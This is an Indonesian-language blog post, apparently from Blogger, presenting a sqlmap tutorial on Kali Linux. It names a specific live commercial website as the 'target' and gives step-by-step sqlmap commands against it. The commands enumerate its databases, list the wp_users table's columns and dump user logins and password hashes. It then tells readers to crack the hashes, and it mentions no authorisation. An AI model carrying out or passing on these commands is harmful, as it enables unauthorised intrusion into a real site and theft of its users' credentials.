Sqlmap di Kali Linux

Sqlmap di Kali Linux

, Edit

Sqlmap di Kali Linux


 Aslmkm wr wb semua =)
Kali ini saya akan share tutorial sqlmap di Kali Linux
Sqlmap adalah alat pengujian penetrasi open source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih dari database server. Muncul dengan mesin deteksi yang kuat, banyak fitur ceruk untuk tester penetrasi tertinggi dan berbagai switch yang berlangsung dari database sidik jari, atas data mengambil dari database, untuk mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi melalui out-koneksi-band. Ini adalah semua tentang sqlmap.

 Oke langsung aja
1. Cari target yg vuln sql, di sini saya udah punya target buat belajar bersama =)
http://www.gnclivewell.com.my/product_info.php?products_id=150
2. Buka terminal anda
3. Ketik sqlmap -u http://www.gnclivewell.com.my/product_info.php?products_id=150 --dbs


4. Database udah terlihat, ada beberapa table, skarang kita pilih salah satu table nya
sqlmap -u http://www.gnclivewell.com.my/product_info.php?products_id=150 -D gncmal --tables


5. Skarang kita ambil kolom nya dari tabel tersebut
sqlmap -u http://www.gnclivewell.com.my/product_info.php?products_id=150 -D gncmal -T wp_users --columns


6. Jreng jreng, skarang kita udah dpat kolom nya, mari kita cek user & password nya, kita dump
sqlmap -u http://www.gnclivewell.com.my/product_info.php?products_id=150 -D gncmal -T wp_users -C user_login,user_pass --dump


Sekarang kita harus mendekripsi hash, untuk mencari hash bisa anda cari sendiri di google .

Selamat mencoba
Semoga bermanfaat
Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

luvne.com resepkuekeringku.com desainrumahnya.com yayasanbabysitterku.com
Subscribe to: Post Comments ( Atom )